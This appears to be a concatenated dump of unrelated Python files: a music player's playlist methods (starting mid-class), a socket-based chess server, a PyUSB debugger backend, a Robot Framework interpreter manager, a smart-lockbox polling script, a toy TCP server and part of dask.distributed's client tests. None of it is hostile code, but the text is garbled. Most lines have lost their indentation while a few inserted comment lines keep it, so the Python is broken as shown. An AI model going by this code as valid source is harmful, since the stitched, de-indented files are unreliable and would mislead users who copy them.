self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
server.py
|
import threading
import socket
import json
import time
import chess
__all__ = ['Server', 'Communicator', 'Communicator2']
class Server(object):
def __init__(self, app):
self.app = app
self._names = [
None,
None
]
        # Default to empty collections so clear_buffers()/start() stay safe
        # while the communicator wiring below remains disabled.
        self._communicators = []
        self._threads = []
        # self._communicators = [
        #     Communicator(0, chess.config['slot_0_ip'], chess.config['slot_0_port']),
        #     Communicator(1, chess.config['slot_1_ip'], chess.config['slot_1_port'])
        # ]
        # self._threads = [
        #     threading.Thread(target=self._communicators[0].run),
        #     threading.Thread(target=self._communicators[1].run)
        # ]
def clear_buffers(self):
for c in self._communicators:
c.clear_buffers()
def start(self):
for t in self._threads:
t.daemon = True
t.start()
def verify_connection(self):
pass
# for i in xrange(2):
# comm = self._communicators[i]
# if comm.name and self._names[i] is None:
# self._names[i] = comm.name
# self.app.connect_user(i, comm.name)
# elif self._names[i] is not None and comm.name is None:
# self._names[i] = None
# self.app.disconnect_user(i)
def send_state(self, id_, state):
self._communicators[id_].send(json.dumps(state))
def receive_movement(self, id_):
r = self._communicators[id_].receive()
if r:
return json.loads(r)
return None
class Communicator2(object):
def __init__(self, id_, host, port):
self._id = id_
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((host, port))
self._socket.listen(1)
self._connection = None
self._address = None
self._inbox = []
self._outbox = []
self.name = None
def clear_buffers(self):
self._inbox = []
self._outbox = []
def send(self, msg):
self._outbox.append(msg)
def receive(self):
if self._inbox:
return self._inbox.pop(0)
def _listen(self):
try:
chess.log.debug('NETWORK', 'Slot %d waiting connection.'%self._id)
self._connection, self._address = self._socket.accept()
chess.log.debug('NETWORK', 'Slot %d connected.'%self._id)
return True
except:
chess.log.error('NETWORK', 'Error on connection at slot %d.'%self._id)
return False
def _receive_name(self):
try:
chess.log.debug('NETWORK', 'Slot %d waiting for user name.'%self._id)
data = self._connection.recv(2**12)
name = json.loads(data)
self.name = name['name']
chess.log.debug('NETWORK', 'Slot %d connected with user "%s".'%(self._id, self.name))
return True
except:
chess.log.error('NETWORK', 'Error on receiving name at slot %d.'%self._id)
return False
def _receive_data(self):
try:
data = self._connection.recv(2**12)
if data:
self._inbox.append(data)
chess.log.debug('NETWORK', 'Slot %s received: "%s"'%(self._id, data))
return True
else:
return False
except socket.timeout as e:
return True
def _send_data(self):
while self._outbox:
data = self._outbox.pop(0)
self._connection.sendall(data)
chess.log.debug('NETWORK', 'Slot %s sent: "%s"'%(self._id, data))
return True
def run(self):
while True:
self.name = None
worked = self._listen()
if not worked: continue
worked = self._receive_name()
if not worked: continue
try:
self._connection.settimeout(0.01)
while True:
worked = self._receive_data()
if not worked: raise socket.error
worked = self._send_data()
if not worked: raise socket.error
except socket.error as e:
chess.log.debug('NETWORK', 'Slot %d disconnected.'%self._id)
class Communicator(object):
def __init__(self, host, port):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((host, port))
self._socket.listen(1)
self._running = True
self._connection = None
self._address = None
self._inbox = []
self._outbox = []
self.name = None
def clear_buffers(self):
self._inbox = []
self._outbox = []
def send(self, msg):
self._outbox.append(msg)
def receive(self):
if self._inbox:
return self._inbox.pop(0)
def stop(self):
self._socket.close()
self._running = False
def _listen(self):
try:
# chess.log.debug('NETWORK', 'Communicator waiting connection.')
self._connection, self._address = self._socket.accept()
chess.log.debug('NETWORK', 'Communicator connected.')
return True
except socket.timeout as e:
return False
except:
chess.log.error('NETWORK', 'Error on connection.')
return False
def _receive_name(self):
try:
# chess.log.debug('NETWORK', 'Communicator waiting for user name.')
data = self._connection.recv(2**12)
name = json.loads(data)
self.name = name['name']
chess.log.debug('NETWORK', 'Communicator connected with user "%s".'%self.name)
return 1
except socket.timeout as e:
return 0
except:
chess.log.error('NETWORK', 'Error on receiving name.')
return -1
def _receive_data(self):
try:
data = self._connection.recv(2**12)
if data:
self._inbox.append(data)
chess.log.debug('NETWORK', 'Communicator received: "%s"'%data)
return True
else:
return False
except socket.timeout as e:
return True
def _send_data(self):
while self._outbox:
data = self._outbox.pop(0)
self._connection.sendall(data)
chess.log.debug('NETWORK', 'Communicator sent: "%s"'%data)
return True
def run(self):
while self._running:
self.name = None
self._socket.settimeout(0.1)
worked = self._listen()
if not worked: continue
try:
self._connection.settimeout(0.01)
while self._running:
worked = self._receive_name()
if worked == 1: break
elif worked == -1: raise socket.error
while self._running:
# print 'trying to receive'
worked = self._receive_data()
if not worked: raise socket.error
# print 'trying to send'
worked = self._send_data()
if not worked: raise socket.error
            except socket.error:
                chess.log.debug('NETWORK', 'Communicator disconnected.')
                self._connection.close()
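# Illustrative usage sketch (not part of the original module; host/port are
# placeholders). run() blocks, so it is typically driven from a background
# thread while the game loop exchanges messages through send()/receive():
#
#     comm = Communicator('0.0.0.0', 9999)
#     threading.Thread(target=comm.run, daemon=True).start()
#     comm.send(json.dumps({'type': 'ping'}).encode())
#     msg = comm.receive()  # None until a client message arrives
#     comm.stop()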
|
pyusb_backend.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from interface import Interface
import logging, os, threading
try:
import usb.core
import usb.util
except ImportError:
    if os.name == "posix" and os.uname()[0] != 'Darwin':
        logging.error("PyUSB is required on a Linux machine")
isAvailable = False
else:
isAvailable = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
vid = 0
pid = 0
intf_number = 0
isAvailable = isAvailable
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.closed = False
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
def start_rx(self):
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
while not self.closed:
self.read_sem.acquire()
if not self.closed:
# Timeouts appear to corrupt data occasionally. Because of this the
# timeout is set to infinite.
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, -1))
@staticmethod
def getAllConnectedInterface(vid, pid):
"""
        returns all the connected devices which match the given vid/pid.
        returns a list of PyUSB (Interface) objects.
"""
# find all devices matching the vid/pid specified
all_devices = usb.core.find(find_all=True, idVendor=vid, idProduct=pid)
if not all_devices:
logging.debug("No device connected")
return None
boards = []
# iterate on all devices found
for board in all_devices:
interface_number = -1
# get active config
config = board.get_active_configuration()
# iterate on all interfaces:
# - if we found a HID interface -> CMSIS-DAP
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number == -1:
continue
try:
if board.is_kernel_driver_active(interface_number):
board.detach_kernel_driver(interface_number)
except Exception as e:
                print(e)
ep_in, ep_out = None, None
for ep in interface:
if ep.bEndpointAddress & 0x80:
ep_in = ep
else:
ep_out = ep
product_name = usb.util.get_string(board, 2)
vendor_name = usb.util.get_string(board, 1)
"""If there is no EP for OUT then we can use CTRL EP"""
if not ep_in:
                logging.error('No IN endpoint found')
return None
new_board = PyUSB()
new_board.ep_in = ep_in
new_board.ep_out = ep_out
new_board.dev = board
new_board.vid = vid
new_board.pid = pid
new_board.intf_number = interface_number
new_board.product_name = product_name
new_board.vendor_name = vendor_name
new_board.start_rx()
boards.append(new_board)
return boards
def write(self, data):
"""
        write data to the OUT endpoint associated with the HID interface
"""
report_size = 64
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
            bmRequestType = 0x21  # host-to-device class request, recipient: interface
            bmRequest = 0x09      # SET_REPORT (HID class-specific request to send data over EP0)
            wValue = 0x200        # output report
            wIndex = self.intf_number  # HID interface number on the mbed board
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
        read data from the IN endpoint associated with the HID interface
"""
        # Busy-wait until rx_task appends a packet.
        while len(self.rcv_data) == 0:
            pass
return self.rcv_data.pop(0)
def setPacketCount(self, count):
# No interface level restrictions on count
self.packet_count = count
def close(self):
"""
close the interface
"""
logging.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
usb.util.dispose_resources(self.dev)
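# Illustrative usage sketch (not part of the original file). The vid/pid pair
# below is a placeholder for whatever CMSIS-DAP board is attached:
#
#     boards = PyUSB.getAllConnectedInterface(vid=0x0D28, pid=0x0204)
#     if boards:
#         dap = boards[0]
#         dap.write([0x00])    # one-byte report, padded to the report size
#         packet = dap.read()  # blocks until rx_task delivers data
#         dap.close()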
|
rf_interpreter_server_manager.py
|
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.basic import is_process_alive, log_and_silence_errors
import itertools
from functools import partial
import os
import sys
import threading
from typing import Any, Dict, Optional
from robocorp_ls_core.protocols import ActionResultDict, IConfig
from robocorp_ls_core.options import DEFAULT_TIMEOUT, USE_TIMEOUTS, NO_TIMEOUT
log = get_logger(__name__)
_next_id = partial(next, itertools.count(0))
def create_server_socket(host, port):
try:
import socket as socket_module
server = socket_module.socket(
socket_module.AF_INET, socket_module.SOCK_STREAM, socket_module.IPPROTO_TCP
)
if sys.platform == "win32":
server.setsockopt(
socket_module.SOL_SOCKET, socket_module.SO_EXCLUSIVEADDRUSE, 1
)
else:
server.setsockopt(socket_module.SOL_SOCKET, socket_module.SO_REUSEADDR, 1)
server.bind((host, port))
except Exception:
        server.close()  # close on any setup failure, then re-raise
raise
return server
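# Illustrative note (not part of the original module): binding to port 0 asks
# the OS for an ephemeral port, which _get_api_client() below reads back with
# getsockname() before handing it to the interpreter process:
#
#     s = create_server_socket(host="127.0.0.1", port=0)
#     _, port = s.getsockname()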
class RfInterpreterServerManager:
def __init__(
self,
verbose: int = 0,
base_log_file: str = "",
on_interpreter_message=None,
uri: str = "",
):
from robotframework_interactive.server.rf_interpreter_ls_config import (
RfInterpreterRobotConfig,
)
from robocorp_ls_core import uris
assert uri
self._uri = uri
self._filename = uris.to_fs_path(uri)
self._lock_api_client = threading.RLock()
        self._server_process = None
        self._rf_interpreter_api_client = None
self._log_extension = ".rf_interpreter"
self._disposed = False
# The config allows clients to set the python executable/env.
self._config: IConfig = RfInterpreterRobotConfig()
self._verbose = verbose
self._base_log_file = base_log_file
self._on_interpreter_message = on_interpreter_message
@property
def uri(self) -> str:
return self._uri
@property
def filename(self) -> str:
return self._filename
@property
def config(self) -> IConfig:
return self._config
@config.setter
def config(self, config: IConfig):
with self._lock_api_client:
self._config.update(config.get_full_settings())
def _get_python_executable(self) -> str:
with self._lock_api_client:
from robotframework_interactive.server.rf_interpreter_ls_config import (
OPTION_ROBOT_PYTHON_EXECUTABLE,
)
config = self._config
python_exe = sys.executable
if config is not None:
python_exe = config.get_setting(
OPTION_ROBOT_PYTHON_EXECUTABLE, str, default=python_exe
)
else:
log.warning(f"self._config not set in {self.__class__}")
return python_exe
def _get_environ(self) -> Dict[str, str]:
from robotframework_interactive.server.rf_interpreter_ls_config import (
OPTION_ROBOT_PYTHON_ENV,
OPTION_ROBOT_PYTHONPATH,
)
with self._lock_api_client:
config = self._config
env = os.environ.copy()
env.pop("PYTHONPATH", "")
env.pop("PYTHONHOME", "")
env.pop("VIRTUAL_ENV", "")
if config is not None:
env_in_settings = config.get_setting(
OPTION_ROBOT_PYTHON_ENV, dict, default={}
)
for key, val in env_in_settings.items():
env[str(key)] = str(val)
pythonpath_entries = config.get_setting(
OPTION_ROBOT_PYTHONPATH, list, []
)
if pythonpath_entries:
# if robot.pythonpath is defined, append those entries to
# the PYTHONPATH env variable when starting the interactive
# console.
current_pythonpath = env.get("PYTHONPATH", "")
if not current_pythonpath:
env["PYTHONPATH"] = os.pathsep.join(pythonpath_entries)
else:
existing = set(current_pythonpath.split(os.pathsep))
env["PYTHONPATH"] = (
current_pythonpath
+ os.pathsep
+ os.pathsep.join(
(
str(x)
for x in pythonpath_entries
if x not in existing
)
)
)
else:
log.warning("self._config not set in %s" % (self.__class__,))
return env
def _get_api_client(self) -> Any:
with self._lock_api_client:
server_process = self._server_process
if server_process is not None:
# If someone killed it, dispose of internal references
# and create a new process.
if not is_process_alive(server_process.pid):
self._dispose_server_process()
if self._disposed:
log.info("Robot Framework Interpreter server already disposed.")
return None
if server_process is None:
try:
from robotframework_interactive.server.rf_interpreter__main__ import (
start_server_process,
)
from robocorp_ls_core.jsonrpc.streams import (
JsonRpcStreamWriter,
JsonRpcStreamReader,
)
from robotframework_interactive.server.rf_interpreter_client import (
RfInterpreterApiClient,
)
args = []
if self._verbose:
args.append("-" + "v" * int(self._verbose))
if self._base_log_file:
log_id = _next_id()
# i.e.: use a log id in case we create more than one in the
# same session.
if log_id == 0:
args.append(
"--log-file="
+ self._base_log_file
+ self._log_extension
)
else:
args.append(
"--log-file="
+ self._base_log_file
+ (".%s" % (log_id,))
+ self._log_extension
)
python_exe = self._get_python_executable()
environ = self._get_environ()
s = create_server_socket(host="127.0.0.1", port=0)
import socket as socket_module
new_socket: Optional[socket_module.socket] = None
connect_event = threading.Event()
def wait_for_connection():
nonlocal new_socket
try:
s.settimeout(
DEFAULT_TIMEOUT if USE_TIMEOUTS else NO_TIMEOUT
)
s.listen(1)
new_socket, _addr = s.accept()
log.info("Connection accepted")
except:
log.exception("Server did not connect.")
finally:
connect_event.set()
s.close()
t = threading.Thread(target=wait_for_connection)
t.start()
# Now, we're listening, let's start up the interpreter to connect back.
_, port = s.getsockname()
args.append("--tcp")
args.append("--host")
args.append("127.0.0.1")
args.append("--port")
args.append(str(port))
cwd = os.path.dirname(self._filename)
if not os.path.isdir(cwd):
raise AssertionError(f"CWD passed is not a directory: {cwd}")
server_process = start_server_process(
args=args, python_exe=python_exe, env=environ, cwd=cwd
)
self._server_process = server_process
connect_event.wait()
if new_socket is None:
raise RuntimeError(
"Timed out while waiting for interpreter server to connect."
)
read_from = new_socket.makefile("rb")
write_to = new_socket.makefile("wb")
w = JsonRpcStreamWriter(write_to, sort_keys=True)
r = JsonRpcStreamReader(read_from)
api = self._rf_interpreter_api_client = RfInterpreterApiClient(
w,
r,
server_process,
on_interpreter_message=self._on_interpreter_message,
)
log.debug(
"Initializing rf interpreter api... (this pid: %s, api pid: %s).",
os.getpid(),
server_process.pid,
)
api.initialize(process_id=os.getpid())
except Exception as e:
if server_process is None:
log.exception(
"Error starting rf interpreter server api (server_process=None)."
)
else:
exitcode = server_process.poll()
if exitcode is not None:
# Note: only read() if the process exited.
log.exception(
"Error starting rf interpreter server api. Exit code: %s Base exception: %s. Stderr: %s",
exitcode,
e,
server_process.stderr.read(),
)
else:
log.exception(
"Error (%s) starting rf interpreter server api (still running). Base exception: %s.",
exitcode,
e,
)
self._dispose_server_process()
finally:
if server_process is not None:
log.debug(
"Server api (%s) created pid: %s", self, server_process.pid
)
else:
log.debug("server_process == None in _get_api_client()")
return self._rf_interpreter_api_client
@log_and_silence_errors(log)
def _dispose_server_process(self):
from robocorp_ls_core.basic import kill_process_and_subprocesses
with self._lock_api_client:
try:
log.debug("Dispose server process.")
if self._server_process is not None:
if is_process_alive(self._server_process.pid):
kill_process_and_subprocesses(self._server_process.pid)
finally:
self._disposed = True
self._server_process = None
self._rf_interpreter_api_client = None
def interpreter_start(self, uri: str) -> ActionResultDict:
api = self._get_api_client()
if api is not None:
return api.interpreter_start(uri)
return {
"success": False,
"message": "Unable to start Robot Framework Interpreter server api.",
"result": None,
}
@property
def waiting_input(self):
api = self._get_api_client()
if api is not None:
return api.waiting_input
return False
def interpreter_evaluate(self, code: str) -> ActionResultDict:
api = self._get_api_client()
if api is not None:
return api.interpreter_evaluate(code)
return {
"success": False,
"message": "Robot Framework Interpreter server api not available.",
"result": None,
}
def interpreter_compute_evaluate_text(
self, code: str, target_type: str = "evaluate"
) -> ActionResultDict:
"""
:param target_type:
'evaluate': means that the target is an evaluation with the given code.
This implies that the current code must be changed to make sense
in the given context.
'completions': means that the target is a code-completion
This implies that the current code must be changed to include
all previous successful evaluations so that the code-completion
contains the full information up to the current point.
"""
api = self._get_api_client()
if api is not None:
return api.interpreter_compute_evaluate_text(code, target_type)
return {
"success": False,
"message": "Robot Framework Interpreter server api not available.",
"result": None,
}
def interpreter_stop(self):
api = self._get_api_client()
if api is not None:
try:
return api.interpreter_stop()
finally:
# After a stop, also dispose the process. It can't be reused
# (a new manager must be created).
self._dispose_server_process()
return {
"success": False,
"message": "Unable to stop Robot Framework Interpreter server api.",
"result": None,
}
|
__main__.py
|
import multiprocessing as mp
import json
from time import sleep
from Network.networking import send_data, form_packet
from arduino_ver1.Translation import buzzer_on, SetLock, SetAngle, rc_time, light, writeWarning
def start_polling(poll_output_queue: mp.Queue, host: str):
"""Start polling the server for data"""
while True:
sleep(1)
print("Poll")
msg = form_packet(host)
content = "".join(send_data(msg)).split("\r\n")[-1]
poll_output_queue.put(content)
if __name__ == "__main__":
input_queue = mp.Queue()
output_queue = mp.Queue()
proc = mp.Process(target=start_polling, args=(output_queue, '192.168.43.32:12345'))
proc.daemon = True
proc.start()
buzzer_cycle = 0
isLocked = True
while True:
args = []
sleep(0.1)
# Blocks on getting data
content = output_queue.get()
        # NOTE: this tamper check is disabled in the original code (`if False` guard).
        if False:
            # Check if the opening is valid:
            # if the photosensor and isLocked contradict each other, sound the alarm.
if rc_time(light) and isLocked:
buzzer_cycle = 5
writeWarning((
"WARNING",
"Unauthorized Access",
"Alarm Activated"
))
continue
print("loop")
content = json.loads(content)
lock = content['lock']
buzzer = content['buzzer']
# Check if user wants to activate the buzzer
if buzzer:
            # Ring the buzzer for the next 10 cycles
            buzzer_cycle = 10
writeWarning((
"Alarm Activated",
"Locate Box Protocol",
"Find my box"
))
if isLocked != lock:
# Activate / Deactivate lock
isLocked = lock
if isLocked:
writeWarning((
"Closing the Lid",
"Locking the box",
"Thank you for using"
))
# Lock the box
SetAngle(90)
SetLock(90)
else:
writeWarning((
"Unlocking the box",
"Opening the Lid",
"Thank you for using"
))
# Unlock the box
SetLock(0)
SetAngle(0)
# Check if the buzzer still needs ringing
if buzzer_cycle:
# Activate buzzer
buzzer_on()
# Decrement cycle
buzzer_cycle -= 1
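# Illustrative note (not part of the original script): the polling process puts
# one payload per second on output_queue; the main loop blocks on get(), so the
# lock and buzzer state are re-evaluated at most once per poll.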
|
tcp3server.py
|
import socket
import threading
from CompressAndDecompress import Compressed
class TCPserver():
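    """Minimal threaded TCP server: listens on localhost:9999 and hands each
    accepted client off to handle_client() on its own thread."""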
def __init__(self):
self.server_ip='localhost'
self.server_port = 9999
def main(self):
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((self.server_ip, self.server_port))
server.listen(1)
print(f'[*] Listening on {self.server_ip}:{self.server_port}')
while True:
client, address = server.accept()
print(f'[*] Accepted connection from {address[0]}:{address[1]}')
            client_handler = threading.Thread(target=self.handle_client, args=(client,))
client_handler.start()
    def handle_client(self, client_socket):
        with client_socket as sock:
            request = sock.recv(1024)
            print("####################################################")
            print(f'[*] Received: {request.decode("utf-8")}')
            # The payload is expected in the form "ciphertext,key"
            parts = request.decode("utf-8").split(',')
            print(f'Ciphertext: {parts[0]} : Key: {parts[1]}')
            # TODO: decompress the payload once the wire format is final,
            # e.g. Compressed(..., int(parts[0])).decompress()
            sock.send(b'ACK')
if __name__ == '__main__':
Myserver = TCPserver()
Myserver.main()
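# Illustrative client sketch (not part of the original file), assuming the
# "ciphertext,key" payload format that handle_client() parses above:
#
#     import socket
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(('localhost', 9999))
#     client.send(b'104101108108111,42')
#     print(client.recv(4096))  # expect b'ACK'
#     client.close()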
|
test_client.py
|
import asyncio
from collections import deque
from concurrent.futures import CancelledError
import gc
import logging
from operator import add
import os
import pickle
import psutil
import random
import subprocess
import sys
import threading
from threading import Semaphore
from time import sleep
import traceback
import warnings
import weakref
import zipfile
import pytest
from toolz import identity, isdistinct, concat, pluck, valmap, partial, first, merge
from tornado import gen
import dask
from dask import delayed
from dask.optimization import SubgraphCallable
import dask.bag as db
from distributed import (
Worker,
Nanny,
fire_and_forget,
LocalCluster,
get_client,
secede,
get_worker,
Executor,
profile,
TimeoutError,
)
from distributed.comm import CommClosedError
from distributed.client import (
Client,
Future,
wait,
as_completed,
tokenize,
_get_global_client,
default_client,
futures_of,
temp_default_client,
)
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import (
ignoring,
mp_context,
sync,
tmp_text,
tokey,
tmpfile,
is_valid_xml,
)
from distributed.utils_test import (
cluster,
slowinc,
slowadd,
slowdec,
randominc,
inc,
dec,
div,
throws,
geninc,
asyncinc,
gen_cluster,
gen_test,
double,
popen,
captured_logger,
varying,
map_varying,
wait_for,
async_wait_for,
pristine_loop,
save_sys_modules,
)
from distributed.utils_test import ( # noqa: F401
client as c,
client_secondary as c2,
cluster_fixture,
loop,
loop_in_thread,
nodebug,
s,
a,
b,
)
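# Note: the tests below use the pre-async/await tornado coroutine style:
# @gen_cluster runs each generator function on an event loop, and
# `yield future` inside a test body awaits a distributed Future.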
@gen_cluster(client=True, timeout=None)
def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = yield x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = yield z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = yield L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = yield L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = yield total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = yield L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = yield c.gather(L4)
if sys.version_info[0] >= 3:
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = yield c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = yield c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = yield c.gather(L1)
assert results == []
@gen_cluster(client=True)
def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert (yield x) == 2
assert (yield y) == 4
assert (yield z) == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert (yield x) == 2
assert (yield y) == 4
with pytest.raises(ZeroDivisionError, match="eight"):
yield z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 4
with pytest.raises(ZeroDivisionError, match="seven"):
yield z
@gen_cluster(client=True)
def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
yield x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
yield x
x = c.compute(delayed(varying(args))(), retries=2)
assert (yield x) == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert (yield x) == 3
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y = [delayed(varying(args))() for args in (xargs, yargs)]
x, y = c.compute([x, y], retries={x: 2})
gc.collect()
assert (yield x) == 30
with pytest.raises(ZeroDivisionError, match="five"):
yield y
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.compute([x, y, z], retries={(y, z): 2})
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 70
assert (yield z) == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
yield fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
yield fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert (yield fut) == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert (yield fut) == 3
@gen_cluster(client=True)
def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
yield x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert (yield x) == 3
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.persist([x, y, z], retries={(y, z): 2})
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 70
assert (yield z) == 80
@gen_cluster(client=True)
def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = yield future
assert y == 100
@gen_cluster(client=True)
def test_future_repr(c, s, a, b):
x = c.submit(inc, 10)
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
@gen_cluster(client=True)
def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = yield x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = yield x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
def test_Future_release(c, s, a, b):
    # Released Futures should be removed from the Client in a timely manner
x = c.submit(div, 1, 1)
yield x
x.release()
yield gen.moment
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
yield gen.moment
assert not c.futures
x = c.submit(div, 1, 0)
yield x.exception()
x.release()
yield gen.moment
assert not c.futures
def test_Future_release_sync(c):
    # Released Futures should be removed from the Client in a timely manner
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
